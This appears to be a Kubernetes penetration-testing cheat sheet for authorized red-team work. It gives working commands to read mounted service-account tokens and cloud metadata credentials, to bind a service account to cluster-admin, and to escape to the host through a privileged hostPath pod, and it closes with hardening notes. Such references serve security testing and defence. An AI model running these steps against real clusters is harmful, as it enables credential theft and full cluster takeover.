KUBERNETES-PENTEST
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Attacking and auditing Kubernetes clusters: enumeration, RBAC abuse, pod escapes and lateral movement. Reference for authorized testing only.
ENUMERATION#
Cluster access & context:
kubectl config view # current kubeconfig
kubectl config get-contexts
kubectl cluster-info
kubectl version --short
kubectl get nodes -o wide
What can I do? (RBAC self-review)
kubectl auth can-i --list
kubectl auth can-i create pods
kubectl auth can-i get secrets --all-namespaces
kubectl auth can-i '*' '*' # cluster-admin check
Inventory:
kubectl get pods -A -o wide
kubectl get secrets -A
kubectl get serviceaccounts -A
kubectl get roles,rolebindings,clusterroles,clusterrolebindings -A
kubectl describe pod <pod> -n <ns>
IN-POD RECON (compromised container)#
Service account token (mounted by default):
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc
Query the API with the pod token:
curl --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces/default/pods
Cloud metadata (if reachable from the pod):
curl http://169.254.169.254/latest/meta-data/ # AWS
curl -H "Metadata-Flavor: Google" \
http://metadata.google.internal/computeMetadata/v1/ # GCP
RBAC ABUSE / PRIVILEGE ESCALATION#
Dangerous verbs to hunt for on a role you control:
create pods # run a privileged pod
create pods/exec # exec into any pod
get/list secrets # harvest credentials
escalate / bind # grant yourself more rights
impersonate # act as another user/SA
create clusterrolebindings # bind yourself to cluster-admin
Bind yourself to cluster-admin (if you hold bind):
kubectl create clusterrolebinding pwn \
--clusterrole=cluster-admin --serviceaccount=<ns>:<sa>
PRIVILEGED / ESCAPE-PRONE POD#
Launch a pod that mounts the host filesystem (if allowed):
# pod.yaml -> hostPID: true, privileged: true, volume hostPath: /
kubectl apply -f pod.yaml
kubectl exec -it hostpod -- chroot /host bash
Red flags in a pod spec:
securityContext.privileged: true
hostPID / hostNetwork / hostIPC: true
volumeMounts of hostPath: / or /var/run/docker.sock
capabilities.add: [SYS_ADMIN]
TOOLING#
kube-hunter # remote/agent cluster attack surface scan kubeaudit # audit workloads for common misconfig kubescape # posture scan (NSA/MITRE frameworks) peirates # in-pod escalation toolkit botb (break-out-the-box) # container escape checks
HARDENING NOTES (blue side)#
- Disable auto-mount of SA tokens where not needed. - Enforce Pod Security Admission (restricted profile). - Least-privilege RBAC; no wildcard verbs/resources. - NetworkPolicies to block pod -> metadata endpoint. - Audit logging on the API server; alert on exec/secrets access. See also: DOCKER-SECURITY, IAC-SECURITY, GCP-SECURITY, AWS-IAM-PRIVESC.